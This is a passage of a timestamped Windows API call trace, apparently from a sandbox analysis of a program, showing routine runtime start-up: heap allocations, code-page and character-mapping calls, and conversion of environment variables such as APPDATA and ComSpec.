0x70a4f0 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70abf0 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x8c) returned 0x70ff58 [0075.487] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x710428 | out: hHeap=0x6f0000) returned 1 [0075.545] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x70fff0 [0075.553] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x80) returned 0x7107f8 [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.612] GetACP () returned 0x4e4 [0075.612] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x220) returned 0x710880 [0075.612] GetLastError () returned 0x0 [0075.612] SetLastError (dwErrCode=0x0) [0075.613] IsValidCodePage (CodePage=0x4e4) returned 1 [0075.613] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f3ec | out: lpCPInfo=0x18f3ec) returned 1 [0075.619] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eeb4 | out: lpCPInfo=0x18eeb4) returned 1 [0075.626] GetLastError () returned 0x0 [0075.626] SetLastError (dwErrCode=0x0) [0075.626] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0075.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0075.633] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18eec8 | out: lpCharType=0x18eec8) returned 1 [0075.633] GetLastError () returned 0x0 [0075.633] SetLastError (dwErrCode=0x0) [0075.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0075.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0075.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0075.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e9f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0075.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f1c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x05Üó\x89\x04ô\x18", lpUsedDefaultChar=0x0) returned 256 [0075.640] GetLastError () returned 0x0 [0075.640] SetLastError (dwErrCode=0x0) [0075.640] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0075.640] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f2c8, cbMultiByte=256, lpWideCharStr=0x18ec18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0075.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0075.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ea08, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0075.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f0c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x05Üó\x89\x04ô\x18", lpUsedDefaultChar=0x0) returned 256 [0075.647] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0075.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0075.696] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7107f8) returned 0x80 [0075.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0075.725] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1f) returned 0x70e958 [0075.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x70e958, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0075.740] GetLastError () returned 0x0 [0075.740] SetLastError (dwErrCode=0x0) [0075.740] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x4) returned 0x710ef0 [0075.740] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710ef0) returned 0x4 [0075.740] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x710ef0, Size=0x8) returned 0x710ef0 [0075.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0075.740] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x710fe8 [0075.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x710fe8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0075.780] GetLastError () returned 0x0 [0075.780] SetLastError (dwErrCode=0x0) [0075.780] GetLastError () returned 0x0 [0075.780] SetLastError (dwErrCode=0x0) [0075.780] GetLastError () returned 0x0 [0075.780] SetLastError (dwErrCode=0x0) [0075.787] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710ef0) returned 0x8 [0075.787] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x710ef0, Size=0xc) returned 0x711028 [0075.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0075.787] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x37) returned 0x711040 [0075.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x711040, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0075.787] GetLastError () returned 0x0 [0075.787] SetLastError (dwErrCode=0x0) [0075.787] GetLastError () returned 0x0 [0075.787] SetLastError (dwErrCode=0x0) [0075.787] GetLastError () returned 0x0 [0075.787] SetLastError (dwErrCode=0x0) [0075.787] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711028) returned 0xc [0075.788] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711028, Size=0x10) returned 0x711028 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0075.788] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x703ba8 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x703ba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.788] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711028) returned 0x10 [0075.788] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711028, Size=0x14) returned 0x711080 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0075.788] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x31) returned 0x7110a0 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7110a0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0075.788] GetLastError () returned 0x0 [0075.788] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711080) returned 0x14 [0075.789] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711080, Size=0x18) returned 0x711080 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0075.789] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x7110e0 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7110e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.789] SetLastError (dwErrCode=0x0) [0075.789] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711080) returned 0x18 [0075.790] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711080, Size=0x1c) returned 0x711100 [0075.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0075.790] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70a520 [0075.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x70a520, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) [0075.790] GetLastError () returned 0x0 [0075.790] SetLastError (dwErrCode=0x0) 